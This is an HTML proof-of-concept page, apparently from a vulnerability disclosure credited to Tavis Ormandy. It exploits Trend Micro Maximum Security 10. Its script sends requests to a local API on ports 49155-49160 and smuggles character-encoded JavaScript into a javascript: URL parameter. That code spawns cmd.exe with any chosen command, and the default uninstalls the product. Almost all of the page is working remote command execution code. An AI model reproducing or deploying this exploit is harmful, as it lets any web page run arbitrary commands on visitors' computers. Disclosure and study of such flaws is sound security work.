<html>
|
<head>
|
<title>Trend Micro Maximum Security 10 Exploit</title>
|
</head>
|
<body>
|
<p>
|
Sample exploit for Trend Micro Maximum Security 10.
|
<p>
|
-- Tavis Ormandy.
|
<p>
|
Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
|
<p>
|
<a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
|
<p>
|
<img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
|
<script>
|
function begin() {
|
// The command you want to run, arguments will work but don't use single quotes.
|
// Lets uninstall Trend Micro.
|
var cmd = document.getElementById('command').value;
|
|
// Start port, Trend Micro trys top open a port starting here until it works.
|
var port = 49155;
|
|
// Wrapper code to start cmd.
|
var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])"
|
|
// We can't send quotes, so encode that via character codes.
|
code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');
|
|
// Create the XHR's
|
for (; port <= 49160; port++) {
|
var x = new XMLHttpRequest();
|
|
x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);
|
|
// We can't tell if it worked because of the cross domain policy.
|
try { x.send(); } catch (e) {};
|
}
|
}
|
</script>
|